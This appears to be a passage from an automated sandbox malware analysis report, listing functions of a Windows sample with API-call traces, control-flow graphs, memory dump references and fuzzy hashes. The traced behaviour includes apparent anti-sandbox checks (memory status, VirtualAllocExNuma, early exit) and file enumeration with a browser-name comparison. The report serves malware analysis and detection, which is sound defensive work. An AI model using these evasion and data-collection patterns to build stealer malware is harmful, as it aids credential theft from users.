                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 66670da43b94bdb883cc18d7c5274a5a91be78385bddc6958e2c9a9215c0a758
                          • Instruction ID: b20fd16b02f523e9ec46b0ee91deb06ef710aa2b2e138d78e1c5d8b0a75459df
                          • Opcode Fuzzy Hash: 66670da43b94bdb883cc18d7c5274a5a91be78385bddc6958e2c9a9215c0a758
                          • Instruction Fuzzy Hash: BB21F171724106DBDB65BF7CD84DA9A37E4AF10300F049524BC4AEB293DE38E8568B90
                          Function 007010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 7010c0-7010cb 2887 7010d0-7010dc 2886->2887 2889 7010de-7010f3 GlobalMemoryStatusEx 2887->2889 2890 701112-701114 ExitProcess 2889->2890 2891 7010f5-701106 2889->2891 2892 701108 2891->2892 2893 70111a-70111d 2891->2893 2892->2890 2894 70110a-701110 2892->2894 2894->2890 2894->2893
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: ed99f43ce1604b441d8d128223b1aff541fb1c6eabda80c3e50e95e17bb8838f
                          • Instruction ID: bd8f084c0582d831056c76b229bef9bb0fd27a18cdc292611006f8eb518aa844
                          • Opcode Fuzzy Hash: ed99f43ce1604b441d8d128223b1aff541fb1c6eabda80c3e50e95e17bb8838f
                          • Instruction Fuzzy Hash: DAF0A770118249DBEB186B64D84A72DF7D8EB01350F904B29EEDAC32D1F678C8409567
                          Function 00718C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 718c88-718cc4 StrCmpCA 2898 718cc6-718cc7 ExitProcess 2895->2898 2899 718ccd-718ce6 2895->2899 2901 718ee2-718eef call 702a20 2899->2901 2902 718cec-718cf1 2899->2902 2903 718cf6-718cf9 2902->2903 2905 718ec3-718edc 2903->2905 2906 718cff 2903->2906 2905->2901 2946 718cf3 2905->2946 2908 718d30-718d3f lstrlen 2906->2908 2909 718e56-718e64 StrCmpCA 2906->2909 2910 718d5a-718d69 lstrlen 2906->2910 2911 718dbd-718dcb StrCmpCA 2906->2911 2912 718ddd-718deb StrCmpCA 2906->2912 2913 718dfd-718e0b StrCmpCA 2906->2913 2914 718e1d-718e2b StrCmpCA 2906->2914 2915 718e3d-718e4b StrCmpCA 2906->2915 2916 718d84-718d92 StrCmpCA 2906->2916 2917 718da4-718db8 StrCmpCA 2906->2917 2918 718d06-718d15 lstrlen 2906->2918 2919 718e88-718e9a lstrlen 2906->2919 2920 718e6f-718e7d StrCmpCA 2906->2920 2933 718d41-718d46 call 702a20 2908->2933 2934 718d49-718d55 call 702930 2908->2934 2909->2905 2929 718e66-718e6d 2909->2929 2935 718d73-718d7f call 702930 2910->2935 2936 718d6b-718d70 call 702a20 2910->2936 2911->2905 2922 718dd1-718dd8 2911->2922 2912->2905 2923 718df1-718df8 2912->2923 2913->2905 2924 718e11-718e18 2913->2924 2914->2905 2925 718e31-718e38 2914->2925 2915->2905 2926 718e4d-718e54 2915->2926 2916->2905 2921 718d98-718d9f 2916->2921 2917->2905 2927 718d17-718d1c call 702a20 2918->2927 2928 718d1f-718d2b call 702930 2918->2928 2931 718ea4-718eb0 call 702930 2919->2931 2932 718e9c-718ea1 call 702a20 2919->2932 2920->2905 2930 718e7f-718e86 2920->2930 2921->2905 2922->2905 2923->2905 2924->2905 2925->2905 2926->2905 2927->2928 2955 718eb3-718eb5 2928->2955 2929->2905 2930->2905 2931->2955 2932->2931 2933->2934 2934->2955 2935->2955 2936->2935 2946->2903 2955->2905 2956 718eb7-718eb9 2955->2956 2956->2905 2957 718ebb-718ebd lstrcpy 2956->2957 2957->2905
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 93d28647fec71990aa09d459c36e29ef73f89611a59f49dfcdb59ddb8c8d294c
                          • Instruction ID: d4ede9a0e848390550b2684b9365ac24bb5ef0d7e99276af7232584228e1d135
                          • Opcode Fuzzy Hash: 93d28647fec71990aa09d459c36e29ef73f89611a59f49dfcdb59ddb8c8d294c
                          • Instruction Fuzzy Hash: D0E0D864514245F7DB145BB9CC489867F68AF54714B04806CE9046F151DB69EC03C7E5
                          Function 00722AD0 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2958 722ad0-722b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2959 722b44-722b59 2958->2959 2960 722b24-722b36 2958->2960
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00722AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00722B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00722B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: f5b7c110163e9dea7b603178c210d8abe5e15545e76ac6d567f8c58b88302484
                          • Instruction ID: b9b4bca30c6ff8b493affd65d086f8faedcf9739a824b12090933636c1534825
                          • Opcode Fuzzy Hash: f5b7c110163e9dea7b603178c210d8abe5e15545e76ac6d567f8c58b88302484
                          • Instruction Fuzzy Hash: F40126B2A48218ABC700CF98EC45B9DF7B8F704B21F00022AF905D3780D3781900CBA1
                          Function 00701011 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00701046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 0070104D
                          • ExitProcess.KERNEL32 ref: 00701058
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: e2dcffd89ba64ae60679703cd6540fa592bee2f001fdc78ac9385a179b0f8052
                          • Instruction ID: d7d34c1d5cfba4ed874a70d89d93c57f0ee68926b605f59b571f0380a0a8c9a4
                          • Opcode Fuzzy Hash: e2dcffd89ba64ae60679703cd6540fa592bee2f001fdc78ac9385a179b0f8052
                          • Instruction Fuzzy Hash: B2E012B079C355BAEA2517619C0EF163A6D9752B11F404101B345EA1E1F5EDB500B978

                          Non-executed Functions

                          Function 00712390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00712402
                          • lstrlen.KERNEL32(\*.*), ref: 0071240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00712436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00712486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 95f232e15572dacb72b80b4633fdea594948b0e5734de099ecab2aac94423661
                          • Instruction ID: 36779b01d27928f077996210b79837fc7f197a3e8801a1c71420474069edddce
                          • Opcode Fuzzy Hash: 95f232e15572dacb72b80b4633fdea594948b0e5734de099ecab2aac94423661
                          • Instruction Fuzzy Hash: 10A27F71A25616DBDB21AFBCDC8CAAE77F9AF04700F044124B805A7292DB7CDD469F90
                          Function 007016A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 007016E2
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070176C
                          • lstrcat.KERNEL32(00000000), ref: 00701776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007017A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007017EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007017F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701875
                          • lstrcat.KERNEL32(00000000), ref: 0070187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007018AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007018FE
                          • lstrlen.KERNEL32(00731794), ref: 00701909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701929
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701966
                          • lstrlen.KERNEL32(\*.*), ref: 00701971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 0070199A
                            • Part of subcall function 00724040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0072406D
                            • Part of subcall function 00724040: lstrcpy.KERNEL32(00000000,?), ref: 007240A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007019C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701A16
                          • lstrlen.KERNEL32(00731794), ref: 00701A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701A41
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701A81
                          • lstrlen.KERNEL32(00731794), ref: 00701A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701AAC
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00701B45
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 00701B70
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 00701B8A
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701C03
                          • lstrlen.KERNEL32(00731794), ref: 00701C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701C31
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701C74
                          • lstrlen.KERNEL32(00731794), ref: 00701C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701CA2
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701CAE
                          • lstrlen.KERNEL32(?), ref: 00701CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00701CE9
                          • lstrlen.KERNEL32(00731794), ref: 00701CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701D14
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701DEB
                          • lstrlen.KERNEL32(00731794), ref: 00701DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701E19
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00701E56
                          • lstrlen.KERNEL32(00731794), ref: 00701E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701E81
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00701E8D
                          • lstrlen.KERNEL32(?), ref: 00701E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 00701EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00701F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00701F45
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 00701F9F
                          • lstrlen.KERNEL32(010D89A0), ref: 00701FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00701FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00701FE3
                          • lstrlen.KERNEL32(00731794), ref: 00701FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070200E
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00702042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070204D
                          • lstrlen.KERNEL32(00731794), ref: 00702058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00702075
                          • lstrcat.KERNEL32(00000000,00731794), ref: 00702081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2085119484.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000737000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000796000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.00000000007AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085133924.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085299188.000000000094A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085312961.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085560997.0000000000BF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085673558.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2085689165.0000000000D97000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                          • String ID: \*.*
                          • API String ID: 4127656590-1173974218
                          • Opcode ID: cd8acce63523a7dd7598976b679417803121d8942d841a050e831024f2e60d9d
                          • Instruction ID: e0a58f02e6b9239a1d5dc0ad98144747563be8dad39159462e7bcf43d43216df
                          • Opcode Fuzzy Hash: cd8acce63523a7dd7598976b679417803121d8942d841a050e831024f2e60d9d
                          • Instruction Fuzzy Hash: FC925472A15216DBCB21EFA4DD8CAAE77F9AF44700F444224F805B7292DB78DD069F90
                          Function 0070DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DBEF
                          • lstrlen.KERNEL32(00734CA8), ref: 0070DBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC17
                          • lstrcat.KERNEL32(00000000,00734CA8), ref: 0070DC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DC4C
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DC8F
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 0070DCD0
                          • StrCmpCA.SHLWAPI(?,007317A0), ref: 0070DCF0
                          • StrCmpCA.SHLWAPI(?,007317A4), ref: 0070DD0A
                          • lstrlen.KERNEL32(0072CFEC), ref: 0070DD1D
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070DD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DD7B
                          • lstrlen.KERNEL32(00731794), ref: 0070DD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDA3
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DDAF
                          • lstrlen.KERNEL32(?), ref: 0070DDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 0070DDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DE19
                          • lstrlen.KERNEL32(00731794), ref: 0070DE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DE6F
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DE7B
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DEBB
                          • lstrlen.KERNEL32(00731794), ref: 0070DEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070DEE6
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DEF2
                          • lstrlen.KERNEL32(010D8830), ref: 0070DF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFA5
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070DFB1
                          • lstrlen.KERNEL32(010D8B70), ref: 0070DFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070DFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070DFF4
                          • lstrlen.KERNEL32(00731794), ref: 0070DFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 0070E022
                          • lstrcat.KERNEL32(00000000,00731794), ref: 0070E02E
                          • lstrlen.KERNEL32(010D8830), ref: 0070E03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070E06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070E09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 0070E0CD
